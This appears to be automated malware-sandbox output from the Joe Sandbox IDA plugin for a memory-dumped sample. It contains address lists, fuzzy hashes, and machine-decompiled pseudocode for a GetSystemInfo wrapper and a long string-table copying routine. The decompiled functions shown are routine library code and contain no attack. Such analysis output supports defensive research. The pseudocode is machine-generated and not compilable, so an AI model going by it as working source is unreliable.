0x0130bd60
0x0130bd60
0x0130bd67
0x0130bd6e
0x0130bd71
0x0130bd74
0x0130bd79
0x0130bd80
0x0130bd87
0x0130bd8e
0x0130bd91
0x0130bd91
0x0130bda1
0x0130bdaa
0x0130bdb3
0x0130bdba
0x0130bdbf
0x0130bdbf
0x0130bdc4
0x0130bdce
0x0130bdd5
0x0130bdd8
0x0130bde5
0x0130bdee
0x0130bdf5
0x0130bdfa
0x0130bdfa
0x0130bdff
0x0130be06
0x0130be0d
0x0130be13
0x0130be1d
0x0130be26
0x0130be2d
0x0130be32
0x0130be32
0x0130be37
0x0130be3b
0x0130be42
0x0130be48
0x0130be52
0x0130be5c
0x0130be5f
0x0130be68
0x0130be6f
0x0130be74
0x0130be74
0x0130be87
0x0130be8e
0x0130be98
0x0130be9f
0x0130bea9
0x0130beb1
0x0130bebb
0x0130bec0
0x0130bec3
0x0130bec5
0x0130bec9
0x0130becf
0x0130bed5
0x0130bf0e
0x0130bf13
0x0130bed7
0x0130bed7
0x0130bede
0x0130bee5
0x0130bee8
0x0130beeb
0x0130bef0
0x0130bef7
0x0130befe
0x0130bf05
0x0130bf08
0x0130bf08
0x0130bf18
0x0130bf21
0x0130bf2a
0x0130bf31
0x0130bf36
0x0130bf36
0x0130bf3b
0x0130bf45
0x0130bf4c
0x0130bf4f
0x0130bf5c
0x0130bf65
0x0130bf6c
0x0130bf71
0x0130bf71
0x0130bf76
0x0130bf7d
0x0130bf84
0x0130bf8a
0x0130bf94
0x0130bf9d
0x0130bfa4
0x0130bfa9
0x0130bfa9
0x0130bfae
0x0130bfb2
0x0130bfb9
0x0130bfbf
0x0130bfc9
0x0130bfd3
0x0130bfd6
0x0130bfdf
0x0130bfe6
0x0130bfeb
0x0130bfeb
0x0130bffe
0x0130c005
0x0130c00f
0x0130c016
0x0130c020
0x0130c028
0x0130c032
0x0130c037
0x0130c03a
0x0130c03c
0x0130c040
0x0130c046
0x0130c04c
0x0130c085
0x0130c08a
0x0130c04e
0x0130c04e
0x0130c055
0x0130c05c
0x0130c05f
0x0130c062
0x0130c067
0x0130c06e
0x0130c075
0x0130c07c
0x0130c07f
0x0130c07f
0x0130c08f
0x0130c098
0x0130c0a1
0x0130c0a8
0x0130c0ad
0x0130c0ad
0x0130c0b2
0x0130c0bc
0x0130c0c3
0x0130c0c6
0x0130c0d3
0x0130c0dc
0x0130c0e3
0x0130c0e8
0x0130c0e8
0x0130c0ed
0x0130c0f4
0x0130c0fb
0x0130c101
0x0130c10b
0x0130c114
0x0130c11b
0x0130c120
0x0130c120
0x0130c125
0x0130c129
0x0130c130
0x0130c136
0x0130c140
0x0130c14a
0x0130c14d
0x0130c156
0x0130c15d
0x0130c162
0x0130c162
0x0130c175
0x0130c17c
0x0130c186
0x0130c18d
0x0130c197
0x0130c19f
0x0130c1a9
0x0130c1ae
0x0130c1b1
0x0130c1b3
0x0130c1b7
0x0130c1bd
0x0130c1c3
0x0130c1fc
0x0130c201
0x0130c1c5
0x0130c1c5
0x0130c1cc
0x0130c1d3
0x0130c1d6
0x0130c1d9
0x0130c1de
0x0130c1e5
0x0130c1ec
0x0130c1f3
0x0130c1f6
0x0130c1f6
0x0130c206
0x0130c20f
0x0130c218
0x0130c21f
0x0130c224
0x0130c224
0x0130c229
0x0130c233
0x0130c23a
0x0130c23d
0x0130c24a
0x0130c253
0x0130c25a
0x0130c25f
0x0130c25f
0x0130c264
0x0130c26b
0x0130c272
0x0130c278
0x0130c282
0x0130c28b
0x0130c292
0x0130c297
0x0130c297
0x0130c29c
0x0130c2a0
0x0130c2a7
0x0130c2ad
0x0130c2b7
0x0130c2c1
0x0130c2c4
0x0130c2cd
0x0130c2d4
0x0130c2d9
0x0130c2d9
0x0130c2ec
0x0130c2f3
0x0130c2fd
0x0130c304
0x0130c30e
0x0130c316
0x0130c320
0x0130c325
0x0130c328
0x0130c32a
0x0130c32e
0x0130c334
0x0130c33a
0x0130c373
0x0130c378
0x0130c33c
0x0130c33c
0x0130c343
0x0130c34a
0x0130c34d
0x0130c350
0x0130c355
0x0130c35c
0x0130c363
0x0130c36a
0x0130c36d
0x0130c36d
0x0130c37d
0x0130c386
0x0130c38f
0x0130c396
0x0130c39b
0x0130c39b
0x0130c3a0
0x0130c3aa
0x0130c3b1
0x0130c3b4
0x0130c3c1
0x0130c3ca
0x0130c3d1
0x0130c3d6
0x0130c3d6
0x0130c3db
0x0130c3e2
0x0130c3e9
0x0130c3ef
0x0130c3f9
0x0130c402
0x0130c409
0x0130c40e
0x0130c40e
0x0130c413
0x0130c417
0x0130c41e
0x0130c424
0x0130c42e
0x0130c438
0x0130c43b
0x0130c444
0x0130c44b
0x0130c450
0x0130c450
0x0130c45e
0x0130c46a
0x0130c474
0x0130c47b
0x0130c485
0x0130c48d
0x0130c497
0x0130c49c
0x0130c49f
0x0130c4a9
0x0130c4ac
0x0130c4b2
0x0130c4eb
0x0130c4ef
0x0130c4b4
0x0130c4b4
0x0130c4bb
0x0130c4c2
0x0130c4c5
0x0130c4c8
0x0130c4cd
0x0130c4d4
0x0130c4db
0x0130c4e2
0x0130c4e5
0x0130c4e5
0x0130c4f4
0x0130c4fd
0x0130c506
0x0130c50d
0x0130c512
0x0130c512
0x0130c517
0x0130c521
0x0130c528
0x0130c52b
0x0130c538
0x0130c541
0x0130c548
0x0130c54d
0x0130c54d
0x0130c552
0x0130c559
0x0130c560
0x0130c566
0x0130c570
0x0130c579
0x0130c580
0x0130c585
0x0130c585
0x0130c58a
0x0130c594
0x0130c59b
0x0130c5a1
0x0130c5ae
0x0130c5b7
0x0130c5be
0x0130c5c3
0x0130c5c7
0x0130c5cd
0x0130c5d2
0x0130c5d9
0x0130c5e0
0x0130c5e7
0x0130c5ee
0x0130c5f5
0x0130c5fc
0x0130c603
0x0130c60a
0x0130c613
0x0130c61b
0x0130c620
0x0130c622
0x0130c62e
0x0130c62e
0x0130c633
0x0130c63a
0x0130c641
0x0130c648
0x0130c64f
0x0130c656
0x0130c65d
0x0130c667
0x0130c66e
0x0130c676
0x0130c67b
0x0130c67d
0x0130c689
0x0130c689
0x0130c690
0x0130c697
0x0130c69e
0x0130c6a5
0x0130c6ac
0x0130c6b3
0x0130c6ba
0x0130c6c1
0x0130c6c8
0x0130c6cd
0x0130c6d0
0x0130c6d5
0x0130c6d7
0x0130c6db
0x0130c6de
0x0130c6e3
0x0130c6e3
0x0130c6f3
0x0130c6f8
0x0130c6fa
0x0130c6ff
0x0130c701
0x0130c707
0x0130c70d
0x0130c712
0x0130c712
0x0130c717
0x0130c71e
0x0130c724
0x0130c72a
0x0130c732
0x0130c735
0x0130c735
0x0130c740
0x0130c747
0x0130c751
0x0130c75b
0x0130c765
0x0130c76f
0x0130c777
0x0130c77f
0x0130c787
0x0130c78f
0x0130c799
0x0130c7a2
0x0130c7b0

Strings

J, xrefs: 0130C6C1

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Concurrency::cancel_current_taskEnvironmentVariable
String ID: J
API String ID: 2182311312-1141589763
Opcode ID: 26bc2e0ccc329309093b5ef0eb6b3311148eef362e50c9c8010e4a11f0d72e85
Instruction ID: 9511f41efbd28b14a215d4fb2ce4fe0e4df55f7377dec9706b5a0e00492caff6
Opcode Fuzzy Hash: 26bc2e0ccc329309093b5ef0eb6b3311148eef362e50c9c8010e4a11f0d72e85
Instruction Fuzzy Hash: ECF29E70910258CFEB15DF28DC54BAEBBB5FF51308F9081D8D409AB2A1DB759A88CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0130A220, Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E0130A220() {
				signed int _v8;
				void* _v24;
				struct _SYSTEM_INFO _v44;
				signed int _t6;
				void* _t14;
				signed int _t15;

				_t6 =  *0x13a4018; // 0x39cca9f6
				_v8 = _t6 ^ _t15;
				asm("xorps xmm0, xmm0");
				_v44.wProcessorLevel = 0;
				asm("movups [ebp-0x28], xmm0");
				asm("movups [ebp-0x18], xmm0"); // executed
				GetSystemInfo( &_v44); // executed
				return E0132EA79(_v8 ^ _t15, _t14);
			}

0x0130a226
0x0130a22d
0x0130a230
0x0130a233
0x0130a23e
0x0130a242
0x0130a246
0x0130a25f

APIs

GetSystemInfo.KERNELBASE(?), ref: 0130A246

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 839dc4168eb291d7d8ed0ce0b8cde7d0898c5b6101a5981a45d01a4dd3e01f6d
Instruction ID: da797f5ea6a452ff485292632bcea5b3bd7f0a34b5595d335b4d79be18f8bdd3
Opcode Fuzzy Hash: 839dc4168eb291d7d8ed0ce0b8cde7d0898c5b6101a5981a45d01a4dd3e01f6d
Instruction Fuzzy Hash: 2AE01231D1420DDBDB10DFE5D5816EEFBB8AF5D304F51525AD804B3240EB706AD49791

Uniqueness

Uniqueness Score: -1.00%

Function 0134A5EB, Relevance: .7, Instructions: 669
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0134A5EB(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _t264;
				intOrPtr _t266;
				void* _t270;
				intOrPtr _t274;
				void* _t278;
				intOrPtr _t280;
				void* _t284;
				intOrPtr _t286;
				void* _t290;
				intOrPtr _t292;
				void* _t296;
				intOrPtr _t298;
				intOrPtr _t300;
				intOrPtr _t302;
				intOrPtr _t303;
				intOrPtr _t305;
				void* _t312;
				intOrPtr _t313;
				intOrPtr _t315;
				void* _t322;
				intOrPtr _t323;
				intOrPtr _t325;
				void* _t332;
				intOrPtr _t333;
				intOrPtr _t335;
				void* _t342;
				intOrPtr _t343;
				intOrPtr _t345;
				void* _t352;
				intOrPtr _t354;
				intOrPtr _t356;
				intOrPtr _t358;
				intOrPtr _t360;
				intOrPtr _t362;
				void* _t370;
				void* _t377;
				void* _t384;
				void* _t391;
				void* _t397;
				void* _t401;
				void* _t405;
				intOrPtr* _t407;
				intOrPtr* _t409;
				intOrPtr* _t411;
				intOrPtr* _t413;
				intOrPtr* _t415;
				intOrPtr _t416;
				unsigned int _t418;
				unsigned int _t425;
				unsigned int _t427;
				unsigned int _t429;
				intOrPtr* _t432;
				intOrPtr* _t433;
				intOrPtr* _t436;
				intOrPtr* _t440;
				intOrPtr* _t444;
				intOrPtr* _t448;
				intOrPtr* _t452;
				intOrPtr* _t454;
				intOrPtr* _t456;
				void* _t457;
				intOrPtr _t458;
				intOrPtr* _t459;
				intOrPtr* _t463;
				intOrPtr* _t468;
				intOrPtr* _t473;
				intOrPtr* _t478;
				intOrPtr* _t483;
				intOrPtr* _t486;
				intOrPtr* _t489;
				intOrPtr* _t492;
				intOrPtr _t505;
				intOrPtr _t506;
				void* _t507;
				void* _t508;
				void* _t509;
				intOrPtr _t512;
				long _t515;
				void* _t522;
				void* _t524;
				intOrPtr* _t526;
				intOrPtr* _t528;
				intOrPtr* _t530;
				intOrPtr* _t532;
				intOrPtr* _t534;
				intOrPtr _t535;
				void* _t540;

				_t512 = 0;
				E01349944( &_v44, __edx, 0);
				_t515 = 0x164;
				_v20 = 0;
				_t505 = 0;
				_v12 = 0;
				_t432 =  *((intOrPtr*)(_v40 + 0x9c));
				_t264 = 0;
				_v8 = _t432;
				_v16 = 0;
				L2:
				while(1) {
					L2:
					if(_t505 != 1) {
						L5:
						_t506 = _t512;
						_v24 = _t264;
						_v24 = _v24 - _t432;
						_t407 = _t432;
						_v28 = _t506;
						do {
							if(_v12 != 1) {
								L9:
								_t433 =  *_t407;
								_v28 = _t433 + 1;
								do {
									_t266 =  *_t433;
									_t433 = _t433 + 1;
								} while (_t266 != 0);
								goto L11;
							} else {
								 *((intOrPtr*)(_v24 + _t407)) = _t264 + _t515;
								_t270 = E01355567(_t264 + _t515, _v20 - _t515,  *_t407);
								_t540 = _t540 + 0xc;
								if(_t270 != 0) {
									L128:
									_push(_t512);
									_push(_t512);
									_push(_t512);
									_push(_t512);
									_push(_t512);
									E013496E7();
									asm("int3");
									return E01352697(_t506, _v72, _v68, _v64, _v60, _v56, 0);
								} else {
									_t506 = _v28;
									goto L9;
								}
							}
							goto L129;
							L11:
							_t264 = _v16;
							_t515 = _t515 + 1 + _t433 - _v28;
							_t506 = _t506 + 1;
							_t407 = _t407 + 4;
							_v28 = _t506;
						} while (_t506 < 7);
						_t506 = _t512;
						_v28 = _t506;
						_t409 = _v8 + 0x1c;
						do {
							if(_v12 != 1) {
								L16:
								_t436 =  *_t409;
								_v28 = _t436 + 1;
								do {
									_t274 =  *_t436;
									_t436 = _t436 + 1;
								} while (_t274 != 0);
								goto L18;
							} else {
								 *((intOrPtr*)(_t409 + _v24)) = _v16 + _t515;
								_t278 = E01355567(_v16 + _t515, _v20 - _t515,  *_t409);
								_t540 = _t540 + 0xc;
								if(_t278 != 0) {
									goto L128;
								} else {
									_t506 = _v28;
									goto L16;
								}
							}
							goto L129;
							L18:
							_t515 = _t515 + 1 + _t436 - _v28;
							_t409 = _t409 + 4;
							_t506 = _t506 + 1;
							_v28 = _t506;
						} while (_t506 < 7);
						_t506 = _t512;
						_v28 = _t506;
						_t411 = _v8 + 0x38;
						do {
							if(_v12 != 1) {
								L23:
								_t440 =  *_t411;
								_v28 = _t440 + 1;
								do {
									_t280 =  *_t440;
									_t440 = _t440 + 1;
								} while (_t280 != 0);
								goto L25;
							} else {
								 *((intOrPtr*)(_t411 + _v24)) = _v16 + _t515;
								_t284 = E01355567(_v16 + _t515, _v20 - _t515,  *_t411);
								_t540 = _t540 + 0xc;
								if(_t284 != 0) {
									goto L128;
								} else {
									_t506 = _v28;
									goto L23;
								}
							}
							goto L129;
							L25:
							_t515 = _t515 + 1 + _t440 - _v28;
							_t411 = _t411 + 4;
							_t506 = _t506 + 1;
							_v28 = _t506;
						} while (_t506 < 0xc);
						_t506 = _t512;
						_v28 = _t506;
						_t413 = _v8 + 0x68;
						do {
							if(_v12 != 1) {
								L30:
								_t444 =  *_t413;
								_v28 = _t444 + 1;
								do {
									_t286 =  *_t444;
									_t444 = _t444 + 1;
								} while (_t286 != 0);
								goto L32;
							} else {
								 *((intOrPtr*)(_t413 + _v24)) = _v16 + _t515;
								_t290 = E01355567(_v16 + _t515, _v20 - _t515,  *_t413);
								_t540 = _t540 + 0xc;
								if(_t290 != 0) {
									goto L128;
								} else {
									_t506 = _v28;
									goto L30;
								}
							}
							goto L129;
							L32:
							_t515 = _t515 + 1 + _t444 - _v28;
							_t413 = _t413 + 4;
							_t506 = _t506 + 1;
							_v28 = _t506;
						} while (_t506 < 0xc);
						_t506 = _t512;
						_v28 = _t506;
						_t415 = _v8 + 0x98;
						do {
							if(_v12 != 1) {
								L37:
								_t448 =  *_t415;
								_v28 = _t448 + 1;
								do {
									_t292 =  *_t448;
									_t448 = _t448 + 1;
								} while (_t292 != 0);
								goto L39;
							} else {
								 *((intOrPtr*)(_t415 + _v24)) = _v16 + _t515;
								_t296 = E01355567(_v16 + _t515, _v20 - _t515,  *_t415);
								_t540 = _t540 + 0xc;
								if(_t296 != 0) {
									goto L128;
								} else {
									_t506 = _v28;
									goto L37;
								}
							}
							goto L129;
							L39:
							_t515 = _t515 + 1 + _t448 - _v28;
							_t415 = _t415 + 4;
							_t506 = _t506 + 1;
							_v28 = _t506;
						} while (_t506 < 2);
						_t416 = _v16;
						if(_v12 != 1) {
							L42:
							_t452 =  *((intOrPtr*)(_v8 + 0xa0));
							_t506 = _t452 + 1;
							do {
								_t298 =  *_t452;
								_t452 = _t452 + 1;
							} while (_t298 != 0);
							_t522 = _t515 + 1 + _t452 - _t506;
							if(_v12 != 1) {
								L46:
								_t454 =  *((intOrPtr*)(_v8 + 0xa4));
								_t93 = _t454 + 1; // 0x1
								_t506 = _t93;
								do {
									_t300 =  *_t454;
									_t454 = _t454 + 1;
								} while (_t300 != 0);
								_t524 = _t522 + 1 + _t454 - _t506;
								if(_v12 != 1) {
									L50:
									_t456 =  *((intOrPtr*)(_v8 + 0xa8));
									_t102 = _t456 + 1; // 0x132afa0
									_t507 = _t102;
									do {
										_t302 =  *_t456;
										_t456 = _t456 + 1;
									} while (_t302 != 0);
									_t457 = _t456 - _t507;
									_t506 = _v12;
									_t104 = _t457 + 1; // 0x132afa1
									_t458 = _v16;
									_t418 = _t104 + _t524;
									if(_t506 == 1) {
										 *((intOrPtr*)(_t458 + 0xac)) =  *((intOrPtr*)(_v8 + 0xac));
										 *((intOrPtr*)(_t458 + 0xb0)) = _t512;
									}
									_v28 = _t512;
									_t526 = _v8 + 0xb4;
									L56:
									while((_t418 & 0x00000001) == 0) {
										if(_t506 != 1) {
											L59:
											_t459 =  *_t526;
											_t508 = _t459 + 2;
											do {
												_t303 =  *_t459;
												_t459 = _t459 + 2;
											} while (_t303 != _t512);
											_t506 = _v12;
											_t526 = _t526 + 4;
											_t458 = _v16;
											_t418 = _t418 + (_t459 - _t508 >> 1) * 2 + 2;
											_t305 = _v28 + 1;
											_v28 = _t305;
											if(_t305 < 7) {
												continue;
											} else {
												_v28 = _t512;
												_t528 = _v8 + 0xd0;
												L64:
												while((_t418 & 0x00000001) == 0) {
													if(_v12 != 1) {
														L67:
														_t463 =  *_t528;
														_t506 = _t463 + 2;
														do {
															_t313 =  *_t463;
															_t463 = _t463 + 2;
														} while (_t313 != _t512);
														_t528 = _t528 + 4;
														_t418 = _t418 + (_t463 - _t506 >> 1) * 2 + 2;
														_t315 = _v28 + 1;
														_v28 = _t315;
														if(_t315 < 7) {
															continue;
														} else {
															_v28 = _t512;
															_t530 = _v8 + 0xec;
															L72:
															while((_t418 & 0x00000001) == 0) {
																if(_v12 != 1) {
																	L75:
																	_t468 =  *_t530;
																	_t506 = _t468 + 2;
																	do {
																		_t323 =  *_t468;
																		_t468 = _t468 + 2;
																	} while (_t323 != _t512);
																	_t530 = _t530 + 4;
																	_t418 = _t418 + (_t468 - _t506 >> 1) * 2 + 2;
																	_t325 = _v28 + 1;
																	_v28 = _t325;
																	if(_t325 < 0xc) {
																		continue;
																	} else {
																		_v28 = _t512;
																		_t532 = _v8 + 0x11c;
																		L80:
																		while((_t418 & 0x00000001) == 0) {
																			if(_v12 != 1) {
																				L83:
																				_t473 =  *_t532;
																				_t506 = _t473 + 2;
																				do {
																					_t333 =  *_t473;
																					_t473 = _t473 + 2;
																				} while (_t333 != _t512);
																				_t532 = _t532 + 4;
																				_t418 = _t418 + (_t473 - _t506 >> 1) * 2 + 2;
																				_t335 = _v28 + 1;
																				_v28 = _t335;
																				if(_t335 < 0xc) {
																					continue;
																				} else {
																					_v28 = _t512;
																					_t534 = _v8 + 0x14c;
																					L88:
																					while((_t418 & 0x00000001) == 0) {
																						if(_v12 != 1) {
																							L91:
																							_t478 =  *_t534;
																							_t506 = _t478 + 2;
																							do {
																								_t343 =  *_t478;
																								_t478 = _t478 + 2;
																							} while (_t343 != _t512);
																							_t534 = _t534 + 4;
																							_t418 = _t418 + (_t478 - _t506 >> 1) * 2 + 2;
																							_t345 = _v28 + 1;
																							_v28 = _t345;
																							if(_t345 < 2) {
																								continue;
																							} else {
																								while((_t418 & 0x00000001) != 0) {
																									_t418 = _t418 + 1;
																								}
																								_t535 = _v16;
																								if(_v12 != 1) {
																									L99:
																									_t483 =  *((intOrPtr*)(_v8 + 0x154));
																									_t506 = _t483 + 2;
																									do {
																										_t354 =  *_t483;
																										_t483 = _t483 + 2;
																									} while (_t354 != _t512);
																									_t425 = _t418 + (_t483 - _t506 >> 1) * 2 + 2;
																									while((_t425 & 0x00000001) != 0) {
																										_t425 = _t425 + 1;
																									}
																									if(_v12 != 1) {
																										L106:
																										_t486 =  *((intOrPtr*)(_v8 + 0x158));
																										_t506 = _t486 + 2;
																										do {
																											_t356 =  *_t486;
																											_t486 = _t486 + 2;
																										} while (_t356 != _t512);
																										_t427 = _t425 + (_t486 - _t506 >> 1) * 2 + 2;
																										while((_t427 & 0x00000001) != 0) {
																											_t427 = _t427 + 1;
																										}
																										if(_v12 != 1) {
																											L113:
																											_t489 =  *((intOrPtr*)(_v8 + 0x15c));
																											_t506 = _t489 + 2;
																											do {
																												_t358 =  *_t489;
																												_t489 = _t489 + 2;
																											} while (_t358 != _t512);
																											_t429 = _t427 + (_t489 - _t506 >> 1) * 2 + 2;
																											while((_t429 & 0x00000001) != 0) {
																												_t429 = _t429 + 1;
																											}
																											if(_v12 != 1) {
																												L120:
																												_t492 =  *((intOrPtr*)(_v8 + 0x160));
																												_t509 = _t492 + 2;
																												do {
																													_t360 =  *_t492;
																													_t492 = _t492 + 2;
																												} while (_t360 != _t512);
																												_t505 = _v12 + 1;
																												_v12 = _t505;
																												_t515 = _t429 + ((_t492 - _t509 >> 1) + 1) * 2;
																												if(_t505 >= 2) {
																													_t512 = _v16;
																													goto L125;
																												} else {
																													_t264 = _v16;
																													_t432 = _v8;
																													goto L2;
																												}
																											} else {
																												 *((intOrPtr*)(_t535 + 0x160)) = _t535 + (_t429 >> 1) * 2;
																												_t370 = E01352808(_t535 + (_t429 >> 1) * 2, _v20 - _t429 >> 1,  *((intOrPtr*)(_v8 + 0x160)));
																												_t540 = _t540 + 0xc;
																												if(_t370 != 0) {
																													goto L128;
																												} else {
																													goto L120;
																												}
																											}
																										} else {
																											 *((intOrPtr*)(_t535 + 0x15c)) = _t535 + (_t427 >> 1) * 2;
																											_t377 = E01352808(_t535 + (_t427 >> 1) * 2, _v20 - _t427 >> 1,  *((intOrPtr*)(_v8 + 0x15c)));
																											_t540 = _t540 + 0xc;
																											if(_t377 != 0) {
																												goto L128;
																											} else {
																												goto L113;
																											}
																										}
																									} else {
																										 *((intOrPtr*)(_t535 + 0x158)) = _t535 + (_t425 >> 1) * 2;
																										_t384 = E01352808(_t535 + (_t425 >> 1) * 2, _v20 - _t425 >> 1,  *((intOrPtr*)(_v8 + 0x158)));
																										_t540 = _t540 + 0xc;
																										if(_t384 != 0) {
																											goto L128;
																										} else {
																											goto L106;
																										}
																									}
																								} else {
																									 *((intOrPtr*)(_t535 + 0x154)) = _t535 + (_t418 >> 1) * 2;
																									_t391 = E01352808(_t535 + (_t418 >> 1) * 2, _v20 - _t418 >> 1,  *((intOrPtr*)(_v8 + 0x154)));
																									_t540 = _t540 + 0xc;
																									if(_t391 != 0) {
																										goto L128;
																									} else {
																										goto L99;
																									}
																								}
																							}
																						} else {
																							 *((intOrPtr*)(_t534 + _v24)) = _v16 + (_t418 >> 1) * 2;
																							_t352 = E01352808(_v16 + (_t418 >> 1) * 2, _v20 - _t418 >> 1,  *_t534);
																							_t540 = _t540 + 0xc;
																							if(_t352 != 0) {
																								goto L128;
																							} else {
																								goto L91;
																							}
																						}
																						goto L129;
																					}
																					_t418 = _t418 + 1;
																					goto L88;
																				}
																			} else {
																				 *((intOrPtr*)(_t532 + _v24)) = _v16 + (_t418 >> 1) * 2;
																				_t342 = E01352808(_v16 + (_t418 >> 1) * 2, _v20 - _t418 >> 1,  *_t532);
																				_t540 = _t540 + 0xc;
																				if(_t342 != 0) {
																					goto L128;
																				} else {
																					goto L83;
																				}
																			}
																			goto L129;
																		}
																		_t418 = _t418 + 1;
																		goto L80;
																	}
																} else {
																	 *((intOrPtr*)(_t530 + _v24)) = _v16 + (_t418 >> 1) * 2;
																	_t332 = E01352808(_v16 + (_t418 >> 1) * 2, _v20 - _t418 >> 1,  *_t530);
																	_t540 = _t540 + 0xc;
																	if(_t332 != 0) {
																		goto L128;
																	} else {
																		goto L75;
																	}
																}
																goto L129;
															}
															_t418 = _t418 + 1;
															goto L72;
														}
													} else {
														 *((intOrPtr*)(_t528 + _v24)) = _v16 + (_t418 >> 1) * 2;
														_t322 = E01352808(_v16 + (_t418 >> 1) * 2, _v20 - _t418 >> 1,  *_t528);
														_t540 = _t540 + 0xc;
														if(_t322 != 0) {
															goto L128;
														} else {
															goto L67;
														}
													}
													goto L129;
												}
												_t418 = _t418 + 1;
												goto L64;
											}
										} else {
											 *((intOrPtr*)(_t526 + _v24)) = _t458 + (_t418 >> 1) * 2;
											_t312 = E01352808(_t458 + (_t418 >> 1) * 2, _v20 - _t418 >> 1,  *_t526);
											_t540 = _t540 + 0xc;
											if(_t312 != 0) {
												goto L128;
											} else {
												goto L59;
											}
										}
										goto L129;
									}
									_t418 = _t418 + 1;
									goto L56;
								} else {
									 *((intOrPtr*)(_t416 + 0xa8)) = _t416 + _t524;
									_t397 = E01355567(_t416 + _t524, _v20 - _t524,  *((intOrPtr*)(_v8 + 0xa8)));
									_t540 = _t540 + 0xc;
									if(_t397 != 0) {
										goto L128;
									} else {
										goto L50;
									}
								}
							} else {
								 *((intOrPtr*)(_t416 + 0xa4)) = _t416 + _t522;
								_t401 = E01355567(_t416 + _t522, _v20 - _t522,  *((intOrPtr*)(_v8 + 0xa4)));
								_t540 = _t540 + 0xc;
								if(_t401 != 0) {
									goto L128;
								} else {
									goto L46;
								}
							}
						} else {
							 *((intOrPtr*)(_t416 + 0xa0)) = _t416 + _t515;
							_t405 = E01355567(_t416 + _t515, _v20 - _t515,  *((intOrPtr*)(_v8 + 0xa0)));
							_t540 = _t540 + 0xc;
							if(_t405 != 0) {
								goto L128;
							} else {
								goto L42;
							}
						}
					} else {
						_t362 = E013576ED(_t515); // executed
						_v16 = _t362;
						if(_t362 == 0) {
							L125:
							if(_v32 != 0) {
								 *(_v44 + 0x350) =  *(_v44 + 0x350) & 0xfffffffd;
							}
							return _t512;
						} else {
							E013478D0(_t512, _t362, _t512, _t515);
							_t264 = _v16;
							_t540 = _t540 + 0xc;
							_t432 = _v8;
							_v20 = _t515;
							_t515 = 0x164;
							goto L5;
						}
					}
					L129:
				}
			}

0x01351f86
0x01351f8c
0x01351f94
0x01351f99
0x01351f9c
0x01351f9e
0x01351fa1
0x01351fa7
0x01351fa9
0x01351fac
0x00000000
0x01351faf
0x01351faf
0x01351fb2
0x01351fdf
0x01351fdf
0x01351fe1
0x01351fe4
0x01351fe7
0x01351fe9
0x01351fec
0x01351ff0
0x01352017
0x01352017
0x0135201c
0x0135201f
0x0135201f
0x01352021
0x01352022
0x00000000
0x01351ff2
0x01351ff8
0x01352004
0x01352009
0x0135200e
0x0135266c
0x0135266c
0x0135266d
0x0135266e
0x0135266f
0x01352670
0x01352671
0x01352676
0x01352696
0x01352014
0x01352014
0x00000000
0x01352014
0x0135200e
0x00000000
0x01352026
0x0135202a
0x0135202d
0x0135202f
0x01352030
0x01352033
0x01352036
0x0135203e
0x01352040
0x01352043
0x01352046
0x0135204a
0x01352073
0x01352073
0x01352078
0x0135207b
0x0135207b
0x0135207d
0x0135207e
0x00000000
0x0135204c
0x01352054
0x01352060
0x01352065
0x0135206a
0x00000000
0x01352070
0x01352070
0x00000000
0x01352070
0x0135206a
0x00000000
0x01352082
0x01352086
0x01352088
0x0135208b
0x0135208c
0x0135208f
0x01352097
0x01352099
0x0135209c
0x0135209f
0x013520a3
0x013520cc
0x013520cc
0x013520d1
0x013520d4
0x013520d4
0x013520d6
0x013520d7
0x00000000
0x013520a5
0x013520ad
0x013520b9
0x013520be
0x013520c3
0x00000000
0x013520c9
0x013520c9
0x00000000
0x013520c9
0x013520c3
0x00000000
0x013520db
0x013520df
0x013520e1
0x013520e4
0x013520e5
0x013520e8
0x013520f0
0x013520f2
0x013520f5
0x013520f8
0x013520fc
0x01352125
0x01352125
0x0135212a
0x0135212d
0x0135212d
0x0135212f
0x01352130
0x00000000
0x013520fe
0x01352106
0x01352112
0x01352117
0x0135211c
0x00000000
0x01352122
0x01352122
0x00000000
0x01352122
0x0135211c
0x00000000
0x01352134
0x01352138
0x0135213a
0x0135213d
0x0135213e
0x01352141
0x01352149
0x0135214b
0x0135214e
0x01352154
0x01352158
0x01352181
0x01352181
0x01352186
0x01352189
0x01352189
0x0135218b
0x0135218c
0x00000000
0x0135215a
0x01352162
0x0135216e
0x01352173
0x01352178
0x00000000
0x0135217e
0x0135217e
0x00000000
0x0135217e
0x01352178
0x00000000
0x01352190
